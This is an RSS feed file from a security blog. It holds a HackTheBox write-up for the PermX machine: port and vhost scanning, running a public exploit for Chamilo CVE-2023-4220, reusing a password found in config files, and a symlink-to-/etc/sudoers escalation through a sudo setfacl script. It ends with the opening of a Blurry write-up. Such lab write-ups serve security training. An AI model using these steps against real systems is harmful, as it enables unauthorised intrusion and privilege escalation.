-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.xml
3939 lines (3939 loc) · 494 KB
/
index.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title/><link>https://h4r1337.github.io/</link><description>Recent content on</description><generator>Hugo -- gohugo.io</generator><language>en</language><lastBuildDate>Mon, 04 Nov 2024 20:37:42 +0530</lastBuildDate><atom:link href="https://h4r1337.github.io/index.xml" rel="self" type="application/rss+xml"/><item><title>PermX | HackTheBox</title><link>https://h4r1337.github.io/posts/permx/</link><pubDate>Mon, 04 Nov 2024 20:37:42 +0530</pubDate><guid>https://h4r1337.github.io/posts/permx/</guid><description><h2 id="overview">Overview</h2>
<img src="https://h4r1337.github.io/img/permx/cover.webp" alt=""><table>
<thead>
<tr>
<th style="text-align: center">Title</th>
<th style="text-align: center"><a href="https://app.hackthebox.com/machines/permx">PermX</a></th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: center">Difficulty</td>
<td style="text-align: center">Easy</td>
</tr>
<tr>
<td style="text-align: center">Machine</td>
<td style="text-align: center">Linux</td>
</tr>
<tr>
<td style="text-align: center">Maker</td>
<td style="text-align: center"><a href="https://app.hackthebox.com/users/1573153"><img src="https://www.hackthebox.com/badge/image/1573153" alt="" style="display: unset"></a></td>
</tr>
</tbody>
</table>
<br>
<div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
<div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
<i
class="bx bx-bulb"
style="color: #bdbb26;"
></i>
<p
class="alert-heading"
style="color: #bdbb26"
>
About Permx
</p>
<i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
></i>
</div>
<div class="alert-content" style="display: none;">
<p><code>PermX</code> is an Easy Difficulty Linux machine featuring a learning management system vulnerable to unrestricted file uploads via <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-4220">CVE-2023-4220</a>. This vulnerability is leveraged to gain a foothold on the machine. Enumerating the machine reveals credentials that lead to SSH access. A <code>sudo</code> misconfiguration is then exploited to gain a <code>root</code> shell.</p></description><content><h2 id="overview">Overview</h2>
<img src="https://h4r1337.github.io/img/permx/cover.webp" alt=""><table>
<thead>
<tr>
<th style="text-align: center">Title</th>
<th style="text-align: center"><a href="https://app.hackthebox.com/machines/permx">PermX</a></th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: center">Difficulty</td>
<td style="text-align: center">Easy</td>
</tr>
<tr>
<td style="text-align: center">Machine</td>
<td style="text-align: center">Linux</td>
</tr>
<tr>
<td style="text-align: center">Maker</td>
<td style="text-align: center"><a href="https://app.hackthebox.com/users/1573153"><img src="https://www.hackthebox.com/badge/image/1573153" alt="" style="display: unset"></a></td>
</tr>
</tbody>
</table>
<br>
<div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
<div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
<i
class="bx bx-bulb"
style="color: #bdbb26;"
></i>
<p
class="alert-heading"
style="color: #bdbb26"
>
About Permx
</p>
<i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
></i>
</div>
<div class="alert-content" style="display: none;">
<p><code>PermX</code> is an Easy Difficulty Linux machine featuring a learning management system vulnerable to unrestricted file uploads via <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-4220">CVE-2023-4220</a>. This vulnerability is leveraged to gain a foothold on the machine. Enumerating the machine reveals credentials that lead to SSH access. A <code>sudo</code> misconfiguration is then exploited to gain a <code>root</code> shell.</p>
</div>
</div>
<script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
</script>
<h1 id="information-gathering">Information Gathering</h1>
<p>Before starting, I have added <code>permx.htb</code> to <code>/etc/hosts</code> file</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#fabd2f">echo</span> -e <span style="color:#b8bb26">&#39;10.10.11.23\tpermx.htn&#39;</span> | sudo tee -a /etc/hosts
</span></span></code></pre></div><p>Now let&rsquo;s start with nmap scan.
Scanned all TCP ports:</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>nmap -p- --min-rate <span style="color:#d3869b">10000</span> -vv -oA nmap/ports 10.10.11.23
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>Nmap scan report <span style="color:#fe8019">for</span> permx.htb <span style="color:#fe8019">(</span>10.10.11.23<span style="color:#fe8019">)</span>
</span></span><span style="display:flex;"><span>Host is up, received syn-ack <span style="color:#fe8019">(</span>0.25s latency<span style="color:#fe8019">)</span>.
</span></span><span style="display:flex;"><span>Scanned at 2024-07-08 15:04:06 IST <span style="color:#fe8019">for</span> 97s
</span></span><span style="display:flex;"><span>Not shown: <span style="color:#d3869b">63855</span> filtered ports, <span style="color:#d3869b">1678</span> closed ports
</span></span><span style="display:flex;"><span>Reason: <span style="color:#d3869b">63855</span> no-responses and <span style="color:#d3869b">1678</span> conn-refused
</span></span><span style="display:flex;"><span>PORT STATE SERVICE REASON
</span></span><span style="display:flex;"><span>22/tcp open ssh syn-ack
</span></span><span style="display:flex;"><span>80/tcp open http syn-ack
</span></span></code></pre></div><p>Enumerated open TCP ports:</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>nmap -p22,80 --min-rate <span style="color:#d3869b">1000</span> -sC -sV -vv -oA nmap/services 10.10.11.23
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>Nmap scan report <span style="color:#fe8019">for</span> permx.htb <span style="color:#fe8019">(</span>10.10.11.23<span style="color:#fe8019">)</span>
</span></span><span style="display:flex;"><span>Host is up, received syn-ack <span style="color:#fe8019">(</span>0.16s latency<span style="color:#fe8019">)</span>.
</span></span><span style="display:flex;"><span>Scanned at 2024-07-08 15:05:58 IST <span style="color:#fe8019">for</span> 12s
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>PORT STATE SERVICE REASON VERSION
</span></span><span style="display:flex;"><span>22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 <span style="color:#fe8019">(</span>Ubuntu Linux; protocol 2.0<span style="color:#fe8019">)</span>
</span></span><span style="display:flex;"><span>80/tcp open http syn-ack Apache httpd 2.4.52
</span></span><span style="display:flex;"><span>| http-methods:
</span></span><span style="display:flex;"><span>|_ Supported Methods: OPTIONS HEAD GET POST
</span></span><span style="display:flex;"><span>|_http-server-header: Apache/2.4.52 <span style="color:#fe8019">(</span>Ubuntu<span style="color:#fe8019">)</span>
</span></span><span style="display:flex;"><span>|_http-title: eLEARNING
</span></span><span style="display:flex;"><span>Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></span></code></pre></div><p>There are only 2 ports open, <code>80</code> and <code>22</code></p>
<hr>
<h1 id="enumeration">Enumeration</h1>
<h2 id="port-80---http-apache">Port 80 - HTTP (Apache)</h2>
<img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240708150113.webp" alt=""><p>There isn&rsquo;t much functionality to test in this site. There&rsquo;s a contact form
in <code>/contact.html</code>, but that is also not working.
Let&rsquo;s do vhost enumeration to check if there&rsquo;s any subdomains:</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>ffuf -u http://permx.htb/ -H <span style="color:#b8bb26">&#39;Host: FUZZ.permx.htb&#39;</span> -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc <span style="color:#d3869b">200</span>
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> /<span style="color:#b8bb26">&#39;___\ /&#39;</span>___<span style="color:#b8bb26">\ </span> /&#39;___<span style="color:#b8bb26">\
</span></span></span><span style="display:flex;"><span><span style="color:#b8bb26"></span> /<span style="color:#b8bb26">\ \_</span>_/ /<span style="color:#b8bb26">\ \_</span>_/ __ __ /<span style="color:#b8bb26">\ \_</span>_/
</span></span><span style="display:flex;"><span> <span style="color:#b8bb26">\ \ </span>,__<span style="color:#b8bb26">\\</span> <span style="color:#b8bb26">\ </span>,__<span style="color:#b8bb26">\/\ \/\ \ \ \ </span>,__<span style="color:#b8bb26">\
</span></span></span><span style="display:flex;"><span><span style="color:#b8bb26"></span> <span style="color:#b8bb26">\ \ \_</span>/ <span style="color:#b8bb26">\ \ \_</span>/<span style="color:#b8bb26">\ \ \_\ \ \ \ \_</span>/
</span></span><span style="display:flex;"><span> <span style="color:#b8bb26">\ \_\ </span> <span style="color:#b8bb26">\ \_\ </span> <span style="color:#b8bb26">\ \_</span>___/ <span style="color:#b8bb26">\ \_\
</span></span></span><span style="display:flex;"><span><span style="color:#b8bb26"></span> <span style="color:#b8bb26">\/</span>_/ <span style="color:#b8bb26">\/</span>_/ <span style="color:#b8bb26">\/</span>___/ <span style="color:#b8bb26">\/</span>_/
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> v1.1.0
</span></span><span style="display:flex;"><span>________________________________________________
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> :: Method : GET
</span></span><span style="display:flex;"><span> :: URL : http://permx.htb/
</span></span><span style="display:flex;"><span> :: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
</span></span><span style="display:flex;"><span> :: Header : Host: FUZZ.permx.htb
</span></span><span style="display:flex;"><span> :: Follow redirects : <span style="color:#fabd2f">false</span>
</span></span><span style="display:flex;"><span> :: Calibration : <span style="color:#fabd2f">false</span>
</span></span><span style="display:flex;"><span> :: Timeout : <span style="color:#d3869b">10</span>
</span></span><span style="display:flex;"><span> :: Threads : <span style="color:#d3869b">40</span>
</span></span><span style="display:flex;"><span> :: Matcher : Response status: <span style="color:#d3869b">200</span>
</span></span><span style="display:flex;"><span>________________________________________________
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>www <span style="color:#fe8019">[</span>Status: 200, Size: 36178, Words: 12829, Lines: 587<span style="color:#fe8019">]</span>
</span></span><span style="display:flex;"><span>lms <span style="color:#fe8019">[</span>Status: 200, Size: 19347, Words: 4910, Lines: 353<span style="color:#fe8019">]</span>
</span></span><span style="display:flex;"><span>:: Progress: <span style="color:#fe8019">[</span>4989/4989<span style="color:#fe8019">]</span> :: Job <span style="color:#fe8019">[</span>1/1<span style="color:#fe8019">]</span> :: <span style="color:#d3869b">226</span> req/sec :: Duration: <span style="color:#fe8019">[</span>0:00:22<span style="color:#fe8019">]</span> :: Errors: <span style="color:#d3869b">0</span> ::
</span></span></code></pre></div><p>Found one subdomain, let&rsquo;s add that to <code>/etc/hosts</code> as well</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#fabd2f">echo</span> -e <span style="color:#b8bb26">&#39;10.10.11.23\tlms.permx.htb&#39;</span> | sudo tee -a /etc/hosts
</span></span></code></pre></div><h4 id="lmspermxhtb"><code>lms.permx.htb</code></h4>
<img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240708151036.webp" alt=""><p>Chamilo is an open source e-learning and content management system.
If we also have the version number, we could easily find a working exploit.
The <code>/robots.txt</code> file is available and there&rsquo;s some files that might disclose the version number.
<img src="https://h4r1337.github.io/img/permx/robots-txt.webp" alt=""></p>
<p>The <code>README.txt</code> file returns a 404 error. But the <code>/documentation/</code> endpoint is working fine and we can see the version of the chamilo instance used here.
<img src="https://h4r1337.github.io/img/permx/version.webp" alt="">
Chamilo LMS &lt;= <code>1.11.24</code> is vulnerable to unauthenticated RCE throught file upload - <a href="https://pentest-tools.com/vulnerabilities-exploits/chamilo-lms-11124-remote-code-execution_22949">CVE-2023-4220</a>.</p>
<h1 id="exploitation---cve-2023-4220">Exploitation - <code>CVE-2023-4220</code></h1>
<p>Found this <a href="https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit/blob/main/CVE-2023-4220.sh?source=post_page-----84871140b508--------------------------------">exploit</a> to be working. Let&rsquo;s run it:</p>
<img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709202401.webp" alt=""><p>And we got the shell.</p>
<h1 id="lateral-movement-to-user">Lateral Movement to user</h1>
<h2 id="local-enumeration">Local Enumeration</h2>
<p>We can start by enumerating the configuration files of chamilo.
After some enumeration in the <code>/var/www/chamilo</code> directory for password in the configuration files I found this:</p>
<img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709203439.webp" alt=""><p>There are only 2 users in the machine.</p>
<img src="https://h4r1337.github.io/img/permx/users.webp" alt=""><p>We can try the password with user <code>mtz</code></p>
<p>And it works:</p>
<img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709203701.webp" alt=""><hr>
<h1 id="privilege-escalation">Privilege Escalation</h1>
<h2 id="local-enumeration-1">Local Enumeration</h2>
<img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709205357.webp" alt=""><p>It looks like we can execute <code>/opt/acl.sh</code> with sudo privileges.</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>cat /opt/acl.sh
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#8ec07c">#!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#8ec07c"></span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">if</span> <span style="color:#fe8019">[</span> <span style="color:#b8bb26">&#34;</span>$#<span style="color:#b8bb26">&#34;</span> -ne <span style="color:#d3869b">3</span> <span style="color:#fe8019">]</span>; <span style="color:#fe8019">then</span>
</span></span><span style="display:flex;"><span> /usr/bin/echo <span style="color:#b8bb26">&#34;Usage: </span>$0<span style="color:#b8bb26"> user perm file&#34;</span>
</span></span><span style="display:flex;"><span> <span style="color:#fabd2f">exit</span> <span style="color:#d3869b">1</span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>user<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;</span>$1<span style="color:#b8bb26">&#34;</span>
</span></span><span style="display:flex;"><span>perm<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;</span>$2<span style="color:#b8bb26">&#34;</span>
</span></span><span style="display:flex;"><span>target<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;</span>$3<span style="color:#b8bb26">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">if</span> <span style="color:#fe8019">[[</span> <span style="color:#b8bb26">&#34;</span>$target<span style="color:#b8bb26">&#34;</span> !<span style="color:#fe8019">=</span> /home/mtz/* <span style="color:#fe8019">||</span> <span style="color:#b8bb26">&#34;</span>$target<span style="color:#b8bb26">&#34;</span> <span style="color:#fe8019">==</span> *..* <span style="color:#fe8019">]]</span>; <span style="color:#fe8019">then</span>
</span></span><span style="display:flex;"><span> /usr/bin/echo <span style="color:#b8bb26">&#34;Access denied.&#34;</span>
</span></span><span style="display:flex;"><span> <span style="color:#fabd2f">exit</span> <span style="color:#d3869b">1</span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#928374;font-style:italic"># Check if the path is a file</span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">if</span> <span style="color:#fe8019">[</span> ! -f <span style="color:#b8bb26">&#34;</span>$target<span style="color:#b8bb26">&#34;</span> <span style="color:#fe8019">]</span>; <span style="color:#fe8019">then</span>
</span></span><span style="display:flex;"><span> /usr/bin/echo <span style="color:#b8bb26">&#34;Target must be a file.&#34;</span>
</span></span><span style="display:flex;"><span> <span style="color:#fabd2f">exit</span> <span style="color:#d3869b">1</span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>/usr/bin/sudo /usr/bin/setfacl -m u:<span style="color:#b8bb26">&#34;</span>$user<span style="color:#b8bb26">&#34;</span>:<span style="color:#b8bb26">&#34;</span>$perm<span style="color:#b8bb26">&#34;</span> <span style="color:#b8bb26">&#34;</span>$target<span style="color:#b8bb26">&#34;</span>
</span></span></code></pre></div><p>The script runs the <code>setfacl</code> command as sudo and gives the user control to specify three arguments that is then passed to <code>setfacl</code>.</p>
<div
class="alert alert-note open"
style="border-color: #076678;"
>
<div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
<i
class="bx bx-info-circle"
style="color: #076678;"
></i>
<p
class="alert-heading"
style="color: #076678"
>
Note
</p>
<i
class='bx bx-chevron-down open'
style="color: #076678;"
></i>
</div>
<div class="alert-content" >
<p><a href="https://www.usenix.org/legacy/publications/library/proceedings/usenix03/tech/freenix03/full_papers/gruenbacher/gruenbacher_html/main.html"><code>setfacl</code></a> is a command utility tool for setting access control lists in files and directories.</p>
</div>
</div>
<script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
</script>
<p>In a closer look, we can see that, <code>acl.sh</code> requires 3 inputs <code>$user</code> <code>$perm</code> and <code>$target</code>.</p>
<ul>
<li><code>$user</code> is the user for which we want to set the permission. In our case user <code>mtz</code>.</li>
<li><code>$perm</code> represents the permission. eg: <code>rwx</code> for read, write, and execute permissions.</li>
<li><code>$target</code> is to specify the file we want to upply the permission.
The script also check if the <code>$target</code> is located in <code>/home/mtz/</code> directory, that is our home directory. And eventhough there is a wildcard (<code>*</code>) used to check this,
we can&rsquo;t use file path like <code>/home/mtz/../../root/root.txt</code> because the script also checks if the <code>$target</code> contains <code>..</code> characters.</li>
</ul>
<p>But what we can try is to create a symlink of a file in our home directory and change its permission.</p>
<h2 id="privilege-escalation-1">Privilege Escalation</h2>
<p>So with that set, we can try changing permission of the <code>/etc/sudoers</code> file:
<img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709210026.webp" alt=""></p>
<p>First, let&rsquo;s create a symlink in our home directory.</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>ln -s /etc/sudoers /home/mtz/test
</span></span></code></pre></div><img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709210138.webp" alt=""><img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709210214.webp" alt=""><p>Now let&rsquo;s edit the file and update the permission of user <code>mtz</code>:</p>
<img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709210254.webp" alt=""><p>And that&rsquo;s it:</p>
<img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709210530.webp" alt=""><h3 id="references">References:</h3>
<ul>
<li><a href="https://pentest-tools.com/vulnerabilities-exploits/chamilo-lms-11124-remote-code-execution_22949">CVE-2023-4220</a></li>
<li><a href="https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit/blob/main/CVE-2023-4220.sh">CVE-2023-4220 Exploit</a></li>
<li><a href="https://www.usenix.org/legacy/publications/library/proceedings/usenix03/tech/freenix03/full_papers/gruenbacher/gruenbacher_html/main.html">POSIX Access Control Lists on Linux</a></li>
</ul></content></item><item><title>Blurry | HackTheBox</title><link>https://h4r1337.github.io/posts/blurry/</link><pubDate>Sun, 13 Oct 2024 18:13:48 +0530</pubDate><guid>https://h4r1337.github.io/posts/blurry/</guid><description><h2 id="overview">Overview</h2>
<img src="https://h4r1337.github.io/img/blurry/cover.webp" alt=""><table>
<thead>
<tr>
<th style="text-align: center">Title</th>
<th style="text-align: center"><a href="https://app.hackthebox.com/machines/Blurry">Blurry</a></th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: center">Difficulty</td>
<td style="text-align: center">Medium</td>
</tr>
<tr>
<td style="text-align: center">Machine</td>
<td style="text-align: center">Linux</td>
</tr>
<tr>
<td style="text-align: center">Maker</td>
<td style="text-align: center"><a href="https://app.hackthebox.com/users/458049"><img src="https://www.hackthebox.com/badge/image/458049" alt="" style="display: unset"></a></td>
</tr>
</tbody>
</table>
<br>
<div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
<div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
<i
class="bx bx-bulb"
style="color: #bdbb26;"
></i>
<p
class="alert-heading"
style="color: #bdbb26"
>
About Blurry
</p>
<i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
></i>
</div>
<div class="alert-content" style="display: none;">
<p>Blurry is a medium-difficulty Linux machine that features DevOps-related vectors surrounding machine learning. The foothold is comprised of a series of CVEs recently disclosed about the ClearML suite. The service provides a web platform, a fileserver, and an API; all of which contain vulnerabilities (<a href="https://nvd.nist.gov/vuln/detail/CVE-2024-24590">CVE-2024-24590</a> - <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-24595">CVE-2024-24595</a>) that can be chained together for remote code execution. Once a shell on the target is obtained, a program that can be run with <code>sudo</code> is discovered. The program loads arbitrary <code>PyTorch</code> models to evaluate them against a protected dataset. While it is known that such models are susceptible to insecure deserialisation, <code>fickling</code> is used to scan the dataset for insecure <code>pickle</code> files , prior to loading the model. Malicious code can be injected into a model, using <code>runpy</code> to bypass the <code>fickling</code> checks.</p></description><content><h2 id="overview">Overview</h2>
<img src="https://h4r1337.github.io/img/blurry/cover.webp" alt=""><table>
<thead>
<tr>
<th style="text-align: center">Title</th>
<th style="text-align: center"><a href="https://app.hackthebox.com/machines/Blurry">Blurry</a></th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: center">Difficulty</td>
<td style="text-align: center">Medium</td>
</tr>
<tr>
<td style="text-align: center">Machine</td>
<td style="text-align: center">Linux</td>
</tr>
<tr>
<td style="text-align: center">Maker</td>
<td style="text-align: center"><a href="https://app.hackthebox.com/users/458049"><img src="https://www.hackthebox.com/badge/image/458049" alt="" style="display: unset"></a></td>
</tr>
</tbody>
</table>
<br>
<div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
<div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
<i
class="bx bx-bulb"
style="color: #bdbb26;"
></i>
<p
class="alert-heading"
style="color: #bdbb26"
>
About Blurry
</p>
<i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
></i>
</div>
<div class="alert-content" style="display: none;">
<p>Blurry is a medium-difficulty Linux machine that features DevOps-related vectors surrounding machine learning. The foothold is comprised of a series of CVEs recently disclosed about the ClearML suite. The service provides a web platform, a fileserver, and an API; all of which contain vulnerabilities (<a href="https://nvd.nist.gov/vuln/detail/CVE-2024-24590">CVE-2024-24590</a> - <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-24595">CVE-2024-24595</a>) that can be chained together for remote code execution. Once a shell on the target is obtained, a program that can be run with <code>sudo</code> is discovered. The program loads arbitrary <code>PyTorch</code> models to evaluate them against a protected dataset. While it is known that such models are susceptible to insecure deserialisation, <code>fickling</code> is used to scan the dataset for insecure <code>pickle</code> files , prior to loading the model. Malicious code can be injected into a model, using <code>runpy</code> to bypass the <code>fickling</code> checks.</p>
</div>
</div>
<script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
</script>
<h1 id="information-gathering">Information Gathering</h1>
<p>Scanned all TCP ports:</p>
